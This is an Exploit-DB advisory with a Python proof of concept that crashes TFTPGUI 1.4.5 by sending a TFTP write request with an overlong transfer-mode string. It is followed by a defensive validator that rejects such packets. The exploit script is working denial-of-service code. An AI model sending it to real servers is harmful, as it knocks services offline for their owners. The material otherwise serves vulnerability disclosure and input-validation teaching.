TFTPGUI – Long Transport Mode Overflow

  • Author: Jeremiah Talamantes
    Date: 2010-05-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12482/
  • # Exploit Title: TFTPGUI Long Transport Mode Overflow
    # Date: 5/1/2010
    # Author: Jeremiah Talamantes
    # Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download
    # Version: 1.4.5
    # Tested on: Windows XP, SP2 (En)
    # CVE : N/A
    
    #!/usr/bin/python
    print "\n#################################################################"
    print "##RedTeam Security ##"
    print "## TFTPGUI Long Transport Mode Overflow##"
    print "##Version 1.4.5##"
    print "##LIST Vulnerability ##"
    print "## ##"
    print "## Jeremiah Talamantes ##"
    print "## labs@redteamsecure.com##"
    print "################################################################# \n"
    
    import socket
    import sys
    
    # Change these values to suit your needs
    host = '192.168.1.108'
    port = 69
     
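    try:
        # UDP is connectionless; this only creates the local socket
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except socket.error:
        print "Error: unable to create socket."
        sys.exit(1)

    # Creating the overly long transport mode string
    # Packet layout: opcode 0x0002 (write request), filename, NUL, mode, NUL
    fn = "A"
    md = "A" * 500
    stuff = "\x00\x02" + fn + "\0" + md + "\0"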
    
    # Send data
    s.sendto(stuff, (host, port))
    print "Check to see if TFTPGUI is still running..."
    
    # End
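
A server-side validation sketch for the request shape used above, added here as an example; it is not part of the original advisory or of TFTPGUI's code. It checks an RRQ/WRQ datagram against the RFC 1350 layout (opcode, filename, NUL, mode, NUL) before any field is copied. The size limits, the function name and the sample packets are assumptions constructed for illustration, and RFC 2347 options are assumed to be unsupported.

```python
import struct

VALID_MODES = {b"netascii", b"octet", b"mail"}  # RFC 1350 transfer modes
MAX_REQUEST = 512    # assumed cap on a request datagram (no options in use)
MAX_FILENAME = 255   # assumed filename limit for this check


def check_tftp_request(datagram):
    """Return (ok, reason) for a UDP payload received on port 69."""
    if len(datagram) < 4:
        return False, "too short"
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (1, 2):                      # 1 = RRQ, 2 = WRQ
        return False, "not a read/write request"
    if len(datagram) > MAX_REQUEST:
        return False, "request exceeds %d bytes" % MAX_REQUEST
    fields = datagram[2:].split(b"\x00")
    # Well-formed: filename NUL mode NUL -> [filename, mode, b""]
    if len(fields) != 3 or fields[2] != b"":
        return False, "malformed string fields"
    filename, mode = fields[0], fields[1]
    if not filename or len(filename) > MAX_FILENAME:
        return False, "bad filename length"
    # Mode names are case-insensitive; anything else is rejected by value,
    # so the mode is never copied into a fixed-size buffer unchecked.
    if mode.lower() not in VALID_MODES:
        return False, "unknown mode (%d bytes)" % len(mode)
    return True, "ok"


# Constructed sample datagrams (not captured traffic).
SAMPLES = {
    "valid read": b"\x00\x01boot.img\x00octet\x00",
    "valid write": b"\x00\x02upload.bin\x00NetASCII\x00",
    "long mode": b"\x00\x02A\x00" + b"A" * 500 + b"\x00",
    "unterminated": b"\x00\x02A\x00octet",
    "oversized": b"\x00\x02" + b"A" * 600 + b"\x00octet\x00",
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print("%-12s %4d bytes -> %s" % (name, len(pkt), check_tftp_request(pkt)))
```

The "long mode" sample is 505 bytes, under the datagram cap, so a size limit on the packet alone does not reject it; the allow-list on the mode field does.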